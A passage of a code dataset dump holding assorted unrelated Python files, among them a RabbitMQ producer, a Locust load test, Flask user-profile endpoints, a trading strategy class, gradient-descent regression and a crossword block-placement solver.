sys.argv[1:])\n except KeyboardInterrupt:\n c = 1\n if c:\n sys.exit(c)\n","sub_path":"projects/apis/iex/other/minmax.py","file_name":"minmax.py","file_ext":"py","file_size_in_byte":1412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"552443301","text":"import matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pylab as plt\nimport numpy as np\n\nspeaker_id = 10\nn_classes = 103\nname = 'softmax_cnn_knn_samples_dcgan_speech_model_clr0.0001_grl0.0001.ckpt-15000.npy'\nsoftmax = np.load(name)\n\npreds = softmax.argmax(axis=1)\nacc = np.sum(preds == speaker_id) / float(len(softmax))\n\n\nbins = set()\nbins = bins | set(preds)\nbins = np.array(sorted(list(bins)))\n\npred_counts = np.bincount(preds, minlength=n_classes)\n\nd = 0.2\nfig, ax = plt.subplots(1, 1, figsize=(6, 4))\nax.bar(np.arange(len(bins)), pred_counts[bins], align='center', alpha=0.7,\n label='Prediction acc. 
{0:.3f}'.format(acc))\nax.set_xticks(np.arange(len(bins)))\nax.set_xticklabels(bins)\nax.legend()\nfig.savefig('pred_histogram_{}.png'.format(name))\n\nfig, ax = plt.subplots(1, 1, figsize=(6, 4))\nax.imshow(softmax, aspect='auto', interpolation='nearest')\nfig.savefig('softmaxes_{}.png'.format(name))\n","sub_path":"asr_evaluate_single_speaker.py","file_name":"asr_evaluate_single_speaker.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"152020798","text":"# -*- encoding: utf-8 -*-\n\"\"\"\n@file: producer.py\n@time: 2020/12/20 12:47 PM\n@author: shenpinggang\n@contact: 1285456152@qq.com\n@desc: message producer\n\"\"\"\nimport pika\n\nQUEUE = 'test_queue_demo'\n\n\ndef main():\n # Initialize the connection parameters.\n credential = pika.PlainCredentials(username='test', password='test')\n parameters = pika.ConnectionParameters(host='192.168.0.197',\n port=5672,\n virtual_host='/',\n credentials=credential)\n\n # Establish the connection\n # using the blocking adapter\n connection = pika.BlockingConnection(parameters=parameters)\n\n # Open a channel\n channel = connection.channel()\n\n # Declare the message queue\n # It is recommended that both the consumer and the producer declare it\n # durable=False: whether the queue is persisted to disk.\n channel.queue_declare(queue=QUEUE, durable=False)\n\n # Specify the exchange and send the message\n # exchange: in simple queue mode there is no exchange, so it is ''\n # routing_key: the name of the declared message queue\n # body: the content of the message to send\n channel.basic_publish(exchange='',\n routing_key=QUEUE,\n body='Produce send message',\n properties=pika.BasicProperties(\n delivery_mode=2 # make the message persistent; 1 means non-persistent\n ))\n\n # Close the connection to RabbitMQ\n connection.close()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"week05/test/queue_mod/producer.py","file_name":"producer.py","file_ext":"py","file_size_in_byte":1526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"135792637","text":"# -*- coding: utf-8 -*-\n\"\"\" EWS Observation tasks \"\"\"\nimport logging\nimport random\nfrom locust import task\nfrom locust_extension import LiveObsTaskSet\nfrom liveobs_ui.utils.converters import convert_list_of_data_dicts\nfrom liveobs_ui.page_object_models.mobile.data_entry_page import DataEntryPage\nfrom liveobs_test_fixtures.obs.ews import NO_RISK\nfrom liveobs_test_fixtures.obs.ews import LOW_RISK_SCORE_1\nfrom liveobs_test_fixtures.obs.ews import LOW_RISK_SCORE_2\nfrom liveobs_test_fixtures.obs.ews import LOW_RISK_SCORE_3\nfrom liveobs_test_fixtures.obs.ews import LOW_RISK_SCORE_4\nfrom liveobs_test_fixtures.obs.ews import MEDIUM_RISK_SCORE_5\nfrom liveobs_test_fixtures.obs.ews import MEDIUM_RISK_SCORE_6\nfrom tasks.mobile.escalation_task import EscalationTasks\n# from tasks.mobile.task_list import TaskList\n\n_LOGGER = logging.getLogger(__name__)\n\n\nclass EwsObs(LiveObsTaskSet):\n \"\"\" TaskSet for EWS Observations \"\"\"\n\n min_wait = 5000\n max_wait = 10000\n\n @task(9)\n class SubmitObs(LiveObsTaskSet):\n \"\"\" TaskSet for submitting EWS Observations \"\"\"\n def submit_obs(self, score):\n \"\"\" Submit observation with supplied score \"\"\"\n score_to_data_map = {\n 0: NO_RISK,\n 1: LOW_RISK_SCORE_1,\n 2: LOW_RISK_SCORE_2,\n 3: LOW_RISK_SCORE_3,\n 4: LOW_RISK_SCORE_4,\n 5: MEDIUM_RISK_SCORE_5,\n 6: MEDIUM_RISK_SCORE_6,\n }\n observation_form = DataEntryPage(self.client)\n form_data = convert_list_of_data_dicts(\n score_to_data_map.get(score))\n observation_form.fill_out_form(form_data)\n self.client.timed_event_for_locust(\n 'request',\n 'Submit Observation Form',\n observation_form.submit_form\n )\n self.client.timed_event_for_locust(\n 'request',\n 'Confirm Submit from Score Popup',\n 
observation_form.confirm_submit_scored_ob\n )\n # TODO this was an attempt to give a 60/40 chance to either click\n # on the escalation task in the modal or go back to the task list.\n # These should instead be represented by a separate TaskSet that\n # represents this decision point and sits in front of\n # EscalationTask.\n next_tasks = [EscalationTasks] * 4\n # next_tasks += [TaskList] * 6\n self.schedule_task(random.choice(next_tasks))\n\n @task(179)\n def score_0(self):\n \"\"\" Submit EWS Observation with Early Warning Score of 0 \"\"\"\n self.submit_obs(0)\n\n @task(175)\n def score_1(self):\n \"\"\" Submit EWS Observation with Early Warning Score of 1 \"\"\"\n self.submit_obs(1)\n\n @task(76)\n def score_2(self):\n \"\"\" Submit EWS Observation with Early Warning Score of 2 \"\"\"\n self.submit_obs(2)\n\n @task(29)\n def score_3(self):\n \"\"\" Submit EWS Observation with Early Warning Score of 3 \"\"\"\n self.submit_obs(3)\n\n @task(6)\n def score_4(self):\n \"\"\" Submit EWS Observation with Early Warning Score of 4 \"\"\"\n self.submit_obs(4)\n\n @task(2)\n def score_5(self):\n \"\"\" Submit EWS Observation with Early Warning Score of 5 \"\"\"\n self.submit_obs(5)\n\n @task(1)\n def score_6(self):\n \"\"\" Submit EWS Observation with Early Warning Score of 6 \"\"\"\n self.submit_obs(6)\n\n @task(1)\n def stop(self):\n \"\"\"\n Escape the EWS form and go up to the level above in Locust\n heirarchy\n \"\"\"\n self.client.timed_event_for_locust(\n 'request',\n 'Abandoning Observation',\n self.client.get,\n '{}/mobile/patients'.format(self.locust.host)\n )\n self.escape('MobileHome')\n","sub_path":"tasks/mobile/ews_obs.py","file_name":"ews_obs.py","file_ext":"py","file_size_in_byte":3962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"301121307","text":"# coding: utf-8\n__author__ = 'Harald Floor Wilhelmsen'\n\nimport confighandler as ch\nimport serial\n\nser = serial.Serial('/dev/ttyACM0', 9600)\n\ndiscoActive = True\nmaxDiscoTime = 3000\nstandardDiscoTime = 20\n\n\ndef parsediscowish(ircmsg, sender):\n if sender not in ch.groups[\"drift\"].members: # if sender is not in group \"drift\" do nothing\n return ''\n global discoActive\n if ircmsg.find('.discodeactivate') != -1:\n discoActive = False\n return 'Discotime deactivated'\n elif ircmsg.find('.discoreactivate') != -1:\n discoActive = True\n return 'Discotime reactivated'\n try:\n if discoActive and ircmsg.find('.discotime') != -1:\n try:\n discoTime = int(\n ircmsg[ircmsg.find('(') + 1: ircmsg.find(')')])\n except ValueError:\n discoTime = standardDiscoTime\n if discoTime > maxDiscoTime:\n discoTime = maxDiscoTime\n print('Discotime for ' + str(discoTime) + '!')\n ser.write(str.encode(str(discoTime)))\n print(ser.read())\n else:\n ser.write(b'0')\n except serial.serialutil.SerialException:\n print('Device unplugged or wrong device used')\n return ''\n","sub_path":"scripts/discohandler.py","file_name":"discohandler.py","file_ext":"py","file_size_in_byte":1248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"308349251","text":"#!/bin/python3\n\nimport os\nimport sys\nimport numpy as np \nimport pandas as pd\nimport matplotlib.pyplot as plt\n\ndef computeCost(X, y, theta):\n '''\n en: Computes the cost of using theta as the parameter for linear\n regression to fit data points in X and y\n pt-br: Calcula a função de custo usando theta como parametro para\n regressão linear para ajustar os pontos em X e y\n '''\n h = X * 
theta.T\n err = h - y\n return np.sum(np.power(err, 2)) / (2 * len(X))\n\ndef gradientDescent(X, y, theta, alpha, num_iters):\n '''\n en: Performs gradient descent to learn theta. Updates theta by\n taking num_iters gradient steps with learning rate alpha\n pt-br: Executa o algoritmo gradient descente atualizando theta\n utilizando num_iters passos com a taxa de aprendizado alpha\n '''\n temp = np.matrix(np.zeros(theta.shape))\n parameters = int(theta.ravel().shape[1])\n cost = np.zeros(num_iters)\n for i in range(num_iters):\n h = X * theta.T\n err_vec = h - y\n # simultaneous update: write the new values into temp, then replace theta\n for j in range(parameters):\n theta_change = np.multiply(err_vec, X[:,j])\n temp[0, j] = theta[0, j] - np.sum(theta_change) * (alpha / len(X))\n\n theta = temp.copy()\n cost[i] = computeCost(X, y, theta)\n\n return (theta, cost)\n\nif __name__ == \"__main__\":\n\n path = os.getcwd() + '/ex1data1.txt'\n data = pd.read_csv(path, header=None, names=['Population', 'Profit'])\n print(data.head())\n print(data.describe())\n data.plot(kind='scatter', x='Population', y='Profit', figsize=(12,8))\n plt.show()\n\n # append a ones column to the front of the data set\n data.insert(0, 'ones', 1)\n\n # set X (training data) and y (target variable)\n cols = data.shape[1]\n X = data.iloc[:,0:cols-1]\n y = data.iloc[:,cols-1:cols]\n\n # convert from data frames to numpy matrices\n X = np.matrix(X.values)\n y = np.matrix(y.values)\n theta = np.matrix(np.array([0,0]))\n\n print(computeCost(X, y, theta))\n\n # initialize variables for learning rate and iterations\n alpha = 0.01\n iters = 1000\n\n # print(gradientDescent(X, y, theta, alpha, iters))","sub_path":"machine-learning-ex1/SimpleLinearRegression.py","file_name":"SimpleLinearRegression.py","file_ext":"py","file_size_in_byte":2123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"242304525","text":"import sys\nfrom csv import DictWriter\nfrom datetime import date\n\nfrom anki_sentence_maker.maker import Maker\nfrom logger import logger\nfrom type.data import Data\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\n\ndef generate_csv(filename: str, sentences_list: list[Data]) -> None:\n \"\"\"Generate a csv file with list of sentences\"\"\"\n with open(filename, \"w\", encoding=\"utf-8-sig\", newline=\"\") as file:\n fieldnames: list[str] = [\"sentence\", \"information\"]\n writer: DictWriter = DictWriter(file, fieldnames=fieldnames)\n\n for sentence in sentences_list:\n for example in sentence.examples:\n writer.writerow(\n {\n \"sentence\": example,\n \"information\": f\"{sentence.name} {sentence.phonetic_notation}\\n({', '.join(sentence.definitions)})\",\n }\n )\n\n\ndef get_sentences_from_args(\n words: list[str],\n) -> list[Data]:\n \"\"\"Get sentences with the words provided\"\"\"\n sentences_list = []\n\n for word in words:\n maker = Maker(word=word)\n sentences_list.append(maker.sentence)\n sentences_list = [s for s in sentences_list if s]\n\n return sentences_list\n\n\ndef main() -> None:\n words: list[str] = sys.argv[1:]\n sentences: list[Data] = get_sentences_from_args(words=words)\n\n if not sentences:\n logger.warning(\"We haven't got any sentences\")\n else:\n brazil_date_notation: str = date.today().strftime(\"%d-%m-%y\")\n filename: str = f\"sentences-{brazil_date_notation}.csv\"\n generate_csv(filename, sentences)\n logger.info(f\"{filename} file has been generated\")\n\n\nif __name__ == \"__main__\":\n 
main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"433799419","text":"\"\"\"\n Read data from an Excel file\n\"\"\"\nimport xlrd\n\ndef read_excel(excel_path, sheet_name, skip_first=True):\n \"\"\"\n Function: read an Excel sheet\n Args:\n excel_path: path to the Excel file\n sheet_name: name of the sheet to read\n skip_first: whether to skip the header row, defaults to True\n Returns: [[1,2,3,4,], [1,2,3,4]]\n \"\"\"\n results = []\n datas = xlrd.open_workbook(excel_path)\n table = datas.sheet_by_name(sheet_name)\n if skip_first:\n start_row = 1\n else:\n start_row = 0\n \n # Read every row of data (1,2)\n for row in range(start_row, table.nrows): # (1,2)\n results.append(table.row_values(row))\n\n return results\n\nif __name__ == \"__main__\":\n data = read_excel('D:\\\\Awork\\\\ljtest202011\\\\PythonProject\\\\PYTESTTEST\\\\data\\\\datas.xlsx', \"登录\")\n print(data)\n\n","sub_path":"PythonProject/PYTESTTEST/utils/exceltools.py","file_name":"exceltools.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"641271412","text":"import torch \nimport pickle as pkl\nimport numpy as np\n\ndef tensor2numpy(filepath:str, savefolder=\"./data/ml_100k/\"):\n rating2=torch.load(filepath)\n arr=rating2.permute(1,2,0).cpu().numpy()\n u,v,R=arr.shape\n output=np.zeros(shape=(u,v))\n for i in range(u):\n for j in range(v):\n for r in range(R):\n if arr[i, j, r]==1:\n output[i,j]=r+1\n try:\n with open(savefolder+\"test_rating_numpy.pkl\", \"wb\") as f:\n pkl.dump(output, f)\n except Exception:\n print(\"Dump error\")\n return ","sub_path":"finaltool.py","file_name":"finaltool.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"40906043","text":"# !/usr/bin/env python\n# coding:utf-8\n\n# @Time : 18-4-19 5:53 PM\n# @Author : LiGang\n# @File : profile.py\n# @Software: PyCharm\n\n# Shows the user name on the home page, the profile page, avatar upload, user name change, querying real-name authentication info, saving real-name authentication info, and querying my house listings\n\nfrom flask import current_app, jsonify\nfrom flask import g\nfrom flask import request\nfrom flask import session\n\nfrom ihome import constants\nfrom ihome import db\nfrom ihome.utils.commons import login_required\nfrom ihome.models import User\nfrom ihome.utils.image_storage import image_storage\nfrom ihome.utils.response_code import RET\nfrom ihome.api_1_0 import api\n\n\n# Function: show the user name on the home page (unused)\n# Request path: /api/v1.0/session\n# Request method: GET\n# Request params: none\n@api.route(\"/session\")\n@login_required\ndef get_user_name():\n\t\"\"\"\n\t1. Get the user id\n\t2. Query the user object from the database\n\t3. Respond to the front end with the user object content\n\t:return:\n\t\"\"\"\n\t# 1. Get the user id\n\tuser_id = g.user_id\n\n\t# 2. Query the user object from the database\n\ttry:\n\t\tuser = User.query.get(user_id)\n\texcept Exception as e:\n\t\tcurrent_app.logger.error(e)\n\t\treturn jsonify(errno=RET.DBERR, errmsg=\"数据库查询异常\")\n\n\tif not user:\n\t\treturn jsonify(errno=RET.DATAERR, errmsg=\"该用户不存在\")\n\n\t# 3. Respond to the front end with the user object content\n\treturn jsonify(errno=RET.OK, errmsg=\"获取成功\", data={\"user_id\": user_id, \"name\": user.name})\n\n\n# Function: show profile information\n# Request path: /api/v1.0/user\n# Request method: GET\n# Request params: none\n@api.route('/user')\n@login_required\ndef get_user_profile():\n\t\"\"\"\n\t# 1. Get the mobile number from the session\n\t# 2. Query the user profile by mobile number\n\t# 3. Check whether the profile exists\n\t# 4. Convert the profile to a dict\n\t# 5. Return the dict to the front end for display\n\t\"\"\"\n\t# 1. Get the mobile number from the session\n\t# mobile = session.get(\"mobile\")\n\tuser_id = g.user_id\n\n\tif not user_id:\n\t\treturn 
jsonify(errno=RET.DATAERR, errmsg=\"用户状态信息过期\")\n\n\t# 2. Query the user profile by mobile number\n\ttry:\n\t\tuser = User.query.filter(User.id == user_id).first()\n\texcept Exception as e:\n\t\tcurrent_app.logger.error(e)\n\t\treturn jsonify(errno=RET.DBERR, errmsg=\"数据库查询异常\")\n\n\t# 3. Check whether the profile exists\n\tif not user:\n\t\treturn jsonify(errno=RET.DATAERR, errmsg=\"该用户不存在\")\n\n\t# 4. Convert the profile to a dict\n\t\t# implemented as a method on the model class\n\n\t# 5. Return the dict to the front end for display\n\treturn jsonify(errno=RET.OK,errmsg=\"获取成功\",data=user.user_to_dict())\n\n\n# Function: upload avatar\n# Request path: /api/v1.0/user/avatar\n# Request method: POST\n# Request params: avatar image\n@api.route(\"/user/avatar\",methods=[\"POST\"])\n@login_required\ndef image_upload():\n\t\"\"\"\n\t1. Get the params: avatar image, user id\n\t2. Validate the params\n\t3. Upload the avatar with the helper utility\n\t4. Get the user object by user id\n\t5. Update the image name on the user object\n\t6. Commit the user object to the database\n\t7. Return the status to the front end\n\t:return:\n\t\"\"\"\n\t# 1. Get the params: avatar image, user id\n\tuser_id = g.user_id\n\timage_data = request.files.get(\"avatar\").read() # files are fetched via request.files\n\n\t# 2. Validate the params\n\tif not all([user_id, image_data]):\n\t\treturn jsonify(errno=RET.PARAMERR, errmsg=\"参数不完整\")\n\n\t# 3. Upload the avatar with the helper utility\n\ttry:\n\t\timage_name = image_storage(image_data)\n\texcept Exception as e:\n\t\tcurrent_app.logger.error(e)\n\t\treturn jsonify(errno=RET.THIRDERR, errmsg=\"七牛云上传失败\")\n\n\t# 4. Get the user object by user id\n\ttry:\n\t\tuser = User.query.get(user_id)\n\texcept Exception as e:\n\t\tcurrent_app.logger.error(e)\n\t\treturn jsonify(errno=RET.DBERR, errmsg=\"数据库查询异常\")\n\n\t# 5. Update the image name on the user object\n\tuser.avatar_url = image_name\n\n\t# 6. Commit the user object to the database\n\ttry:\n\t\tdb.session.commit()\n\texcept Exception as e:\n\t\tcurrent_app.logger.error(e)\n\t\tdb.session.rollback()\n\t\treturn jsonify(errno=RET.DBERR, errmsg=\"用户头像保存异常\")\n\n\t# 7. Return the status to the front end\n\tavatar_url = constants.QINIU_DOMIN_PREFIX + user.avatar_url\n\treturn jsonify(errno=RET.OK, errmsg=\"头像上传成功\", data={\"avatar_url\": avatar_url})\n\n\n# Function: change the user name\n# Request path: /api/v1.0/user/name\n# Request method: POST or PUT\n# Request params: none\n@api.route(\"/user/name\",methods=[\"PUT\"])\n@login_required\ndef set_user_name():\n\t\"\"\"\n\t1. Get the user id and the user name\n\t2. Query the user object from the database by user id\n\t3. Check whether the user exists\n\t4. Update the user name on the user object\n\t5. Save to the database\n\t6. Return\n\t:return:\n\t\"\"\"\n\t# 1. Get the user id and the user name\n\tuser_id = g.user_id\n\tusername = request.json.get(\"name\")\n\n\t# 2. Query the user object from the database by user id\n\ttry:\n\t\tuser = User.query.filter(User.id == user_id).first()\n\texcept Exception as e:\n\t\tcurrent_app.logger.error(e)\n\t\treturn jsonify(errno=RET.DBERR, errmsg=\"数据库查询异常\")\n\n\t# 3. Check whether the user exists\n\tif not user:\n\t\treturn jsonify(errno=RET.DATAERR, errmsg=\"该用户不存在\")\n\n\t# 4. Update the user name on the user object\n\tuser.name = username\n\n\t# 5. Save to the database\n\ttry:\n\t\tdb.session.commit()\n\texcept Exception as e:\n\t\tcurrent_app.logger.error(e)\n\t\treturn jsonify(errno=RET.DBERR, errmsg=\"数据更新异常\")\n\n\t# 6. Return\n\treturn jsonify(errno=RET.OK, errmsg=\"保存用户名成功\")\n\n\n# Function: query real-name authentication info\n# Request path: /user/auth\n# Request method: GET\n# Request params: none\n@api.route('/user/auth')\n@login_required\ndef get_user_auth():\n\t\"\"\"\n\t1. Get the user id\n\t2. Query the user object by id\n\t3. Check whether the user exists\n\t4. Respond with the real name and the id card number\n\t:return:\n\t\"\"\"\n\t# 1. Get the user id\n\tuser_id = g.user_id\n\n\t# 2. Query the user object by id\n\ttry:\n\t\tuser = User.query.filter(User.id == user_id).first()\n\texcept Exception as e:\n\t\tcurrent_app.logger.error(e)\n\t\treturn jsonify(errno=RET.DBERR, errmsg=\"数据库查询异常\")\n\n\t# 3. Respond to the front end\n\treturn jsonify(errno=RET.OK, errmsg=\"获取成功\", data=user.user_to_dict())\n\n\n# Function: save real-name authentication info\n# Request path: /api/v1.0/auth\n# Request method: POST\n# Request params: real name, id card number\n@api.route('/user/auth', 
methods=['POST'])\n@login_required\ndef set_user_auth():\n\t\"\"\"\n\t1. Get the user id\n\t2. Get the params\n\t3. Query the user object by id\n\t4. Update the user info in the database\n\t5. Return the result to the frontend\n\t:return:\n\t\"\"\"\n\t# 1. Get the user id\n\tuser_id = g.user_id\n\n\t# 2. Get the params\n\tdata_dict = request.get_json()\n\treal_name = data_dict.get(\"real_name\")\n\tid_card = data_dict.get(\"id_card\")\n\n\t# 2.1 Validate the params\n\tif not all([real_name, id_card]):\n\t\treturn jsonify(errno=RET.DATAERR, errmsg=\"incomplete parameters\")\n\n\t# 3. Query the user object by id\n\ttry:\n\t\tuser = User.query.filter(User.id == user_id).first()\n\texcept Exception as e:\n\t\tcurrent_app.logger.error(e)\n\t\treturn jsonify(errno=RET.DBERR, errmsg=\"database query error\")\n\n\t# 4. Set the user info\n\tuser.real_name = real_name\n\tuser.id_card = id_card\n\t# 4.1 Commit the updated user info to the database\n\ttry:\n\t\tdb.session.commit()\n\texcept Exception as e:\n\t\tcurrent_app.logger.error(e)\n\t\treturn jsonify(errno=RET.DBERR, errmsg=\"database save error\")\n\n\t# 5. Return the result to the frontend\n\treturn jsonify(errno=RET.OK, errmsg=\"authentication succeeded\")\n\n\n# Feature: fetch the user's house listings\n# Request path: /api/v1.0/user/houses\n# Request method: GET\n# Request params: none\n@api.route(\"/user/houses\")\n@login_required\ndef get_user_houses():\n\t\"\"\"\n\t1. Get the user id\n\t2. Query the user object by id\n\t3. Check whether the user exists\n\t4. Fetch all houses via the user: user.houses --> list(house)\n\t5. Convert every house in the list to a dict\n\t6. Return the full list of houses\n\t:return:\n\t\"\"\"\n\t# 1. Get the user id\n\tuser_id = g.user_id\n\n\t# 2. Query the user object by id\n\ttry:\n\t\tuser = User.query.filter(User.id == user_id).first()\n\texcept Exception as e:\n\t\tcurrent_app.logger.error(e)\n\t\treturn jsonify(errno=RET.DBERR, errmsg=\"database query error\")\n\n\t# 3. Check whether the user exists\n\tif not user:\n\t\treturn jsonify(errno=RET.DATAERR, errmsg=\"user does not exist\")\n\n\t# 4. Fetch all houses via the user: user.houses --> list(house)\n\thouses = user.houses\n\n\t# 5. Convert every house in the list to a dict\n\thouses_list = []\n\tif houses:\n\t\tfor house in houses:\n\t\t\thouses_list.append(house.to_basic_dict())\n\n\t# 6. Return the full list of houses\n\treturn jsonify(errno=RET.OK, errmsg=\"houses fetched successfully\", data={\"houses\": houses_list})\n","sub_path":"ihome/ihome/api_1_0/profile.py","file_name":"profile.py","file_ext":"py","file_size_in_byte":8713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"87654081","text":"from big_algo_framework.big.general import *\nfrom big_algo_framework.big.indicators import *\nfrom big_algo_framework.big.resample_price_indicators import resample\nfrom big_algo_framework.ib.trade import *\nimport time\n\nclass Strat():\n def __init__(self, app, ticker, db):\n self.app = app\n self.ticker = ticker\n self.db = db\n self.indi = BIGIndicators()\n self.cont = StockContract()\n self.con = self.cont.getStockContract(ticker)\n\n self.tf_props = {\n \"1 day\": {'base_timeframe': '1 day', 'rule': '24H'},\n }\n\n def checkTradeConditions(self, direction, dashboard_dict):\n print(\"COMMENCING TICKER...: \", self.ticker)\n orders = self.db[\"orders\"]\n order_results = orders.find(orderType=\"STP\", status=(\"PreSubmitted\", \"Submitted\"))\n\n ticker_pos = []\n for row in order_results:\n ticker_pos.append(row['ticker'])\n print(ticker_pos)\n\n if self.ticker not in ticker_pos:\n #DAILY TIME FRAME RULES\n daily_resample = resample(self.db, [self.ticker], self.tf_props[\"1 day\"][\"base_timeframe\"], \"1 day\", self.tf_props[\"1 day\"][\"rule\"])\n daily_df = daily_resample.resample_price()\n daily_df.reset_index(level=0, inplace=True)\n\n #Get daily ATR\n daily_df[\"ATR\"] = self.indi.atr(daily_df, atr_length=14, atr_ma_type=\"ema\", adjust=False)[\"ATR\"]\n if daily_df[\"ATR\"].iloc[-1] > 2:\n self.app.reqContractDetails(12, self.con)\n time.sleep(1)\n\n 
order_dict = {\"ticker\": self.ticker,\n \"strategy\": \"my_strategy\",\n \"entryTIF\": \"GTD\",\n \"entryGoodTillDate\": \"20211029 10:30:00\",\n \"OrderRef\": \"my_orderRed\",\n \"entryPrice\": 100,\n \"stopLossPrice\": 50,\n \"totalRisk\": 100,\n \"tp1\": 150,\n \"tp2\": 200\n }\n\n getAction(direction, order_dict)\n order_dict[\"quantity\"] = self.cont.getQuantity(order_dict)\n\n dashboard_dict[\"ticker\"] = self.ticker\n dashboard_dict[\"atr\"] = daily_df[\"ATR\"].iloc[-1]\n\n print(\"Sending orders...\")\n takeTrade(self.app, self.con, order_dict, dashboard_dict)\n self.writeDashboard(order_dict, dashboard_dict)\n\n def writeDashboard(self, order_dict, dashboard_dict):\n table = self.db[\"strategy\"]\n\n data = dict(parentOrderId1=dashboard_dict[\"parentOrderId1\"],\n profitOrderId1=dashboard_dict[\"profitOrderId1\"],\n stopLossOrderId1=dashboard_dict[\"stopLossOrderId1\"],\n parentOrderId2=dashboard_dict[\"parentOrderId2\"],\n profitOrderId2=dashboard_dict[\"profitOrderId2\"],\n stopLossOrderId2=dashboard_dict[\"stopLossOrderId2\"],\n entryPrice=order_dict[\"entryPrice\"],\n riskPerShare = order_dict[\"riskPerShare\"],\n ticker=dashboard_dict[\"ticker\"])\n\n table.upsert(data, ['orderId'])\n","sub_path":"sample_strategies/strat_class.py","file_name":"strat_class.py","file_ext":"py","file_size_in_byte":3284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"235075128","text":"from flask import jsonify,request\nfrom src.core.web import app, render_view\nfrom src.db.DAO.mysqlDAO import DAOManagerMysql\n\n\n@app.route('/search',methods=('GET',))\ndef search():\n mysqlDM = DAOManagerMysql() \n # verficia si el toquen que se tiene en las cookies esta registrado en la bd y devulve el usuario corresponidente\n user = mysqlDM.do(mysqlDM.USER,mysqlDM.EXIST_TOKEN,request.cookies.get('token'))\n \n if user:\n search = request.args.get('search')\n users = mysqlDM.do(mysqlDM.USER, mysqlDM.GET_ALL,search)\n lista=[] \n for us in users:\n lista.append({'email':us.email})\n \n return jsonify(lista)\n\n return render_view('sign_in.html')","sub_path":"src/webapp/controllers/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"191765927","text":"from celery import shared_task\nfrom django.core.mail import send_mail\n\nfrom account.models import User\n\n\n@shared_task\ndef send_confirmation_email(user_id):\n\n user = User.objects.get(id=user_id)\n\n link = f'/activate/{user.confirmation_token}'\n body = f'To complete the authorization process you have to follow this link: {link}'\n\n send_mail(\n 'The last step',\n body,\n 'kyoto.cliche@gmail.com',\n [user.email],\n fail_silently=False,\n )\n","sub_path":"blog/account/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"254396513","text":"\"\"\" Works with digital ocean servers \"\"\"\nfrom requests import get\nimport digitalocean\n\n\nclass DoHandler(digitalocean.Manager):\n my_ip = ''\n\n def __init__(self):\n self.my_ip = get('https://api.ipify.org').text\n super(DoHandler).__init__()\n\n\n\n","sub_path":"do_handler.py","file_name":"do_handler.py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"270246040","text":"import sys\nimport random\nfrom 
collections import deque \n\n\"\"\"BEGINS BLOCK PLACING SECTION\"\"\"\n\n#print out the puzzle\ndef print_puzzle(board, num_cols):\n final_string = \"\"\n for index, square in enumerate(board):\n if index % num_cols == 0 and index != 0:\n final_string += \"\\n\"\n final_string += (square + \" \")\n print(final_string)\n\n#add seed strings to the board\ndef add_words_to_board(board, num_cols, extra_words):\n for direction, row, col, legit_word in extra_words:\n coord = (col + (row * num_cols))\n if direction == 'H':\n for letter in legit_word:\n board[coord] = letter\n if letter == '#':\n symmetrical_index = len(board) - (coord + 1)\n board[symmetrical_index] = '#'\n coord += 1\n elif direction == 'V':\n for letter in legit_word:\n board[coord] = letter\n if letter == '#':\n symmetrical_index = len(board) - (coord + 1)\n board[symmetrical_index] = '#'\n coord += num_cols\n return board\n\n#fill in all open spaces with @ signs\ndef area_fill(board, num_rows, num_cols, row, col):\n if row < 0 or row >= num_rows or col < 0 or col >= num_cols:\n return board\n coord = (col + (row * num_cols))\n board[coord] = '@'\n if row-1 >= 0 and board[coord-num_cols] != '@' and board[coord-num_cols] != '#':\n board = area_fill(board, num_rows, num_cols, row-1, col)\n if row+1 < num_rows and board[coord+num_cols] != '@' and board[coord+num_cols] != '#':\n board = area_fill(board, num_rows, num_cols, row+1, col)\n if col-1 >= 0 and board[coord-1] != '@' and board[coord-1] != '#':\n board = area_fill(board, num_rows, num_cols, row, col-1)\n if col+1 < num_cols and board[coord+1] != '@' and board[coord+1] != '#':\n board = area_fill(board, num_rows, num_cols, row, col+1)\n return board\n\n#returns true or false if no part of board is cut off\ndef fully_connected(board, num_rows, num_cols):\n new_board = board.copy()\n index = new_board.index('-')\n area_filled_board = area_fill(new_board, num_rows, num_cols, index//num_cols, index % num_cols)\n if '-' in area_filled_board:\n return False\n else:\n return True\n\n#gets all implied squares for a given index\ndef get_implied_squares(board, index, num_rows, num_cols):\n #up\n current_index = index\n up_list = list()\n store_list = list()\n block = True\n for i in range(3):\n current_index -= num_cols\n if current_index >= 0:\n if board[current_index] == '#':\n if not block:\n for item in store_list:\n up_list.append(item)\n break\n else:\n store_list.append(current_index)\n block = False\n else:\n if not block:\n for item in store_list:\n up_list.append(item)\n break\n #down\n current_index = index\n down_list = list()\n store_list = list()\n block = True\n for i in range(3):\n current_index += num_cols\n if current_index < len(board):\n if board[current_index] == '#':\n if not block:\n for item in 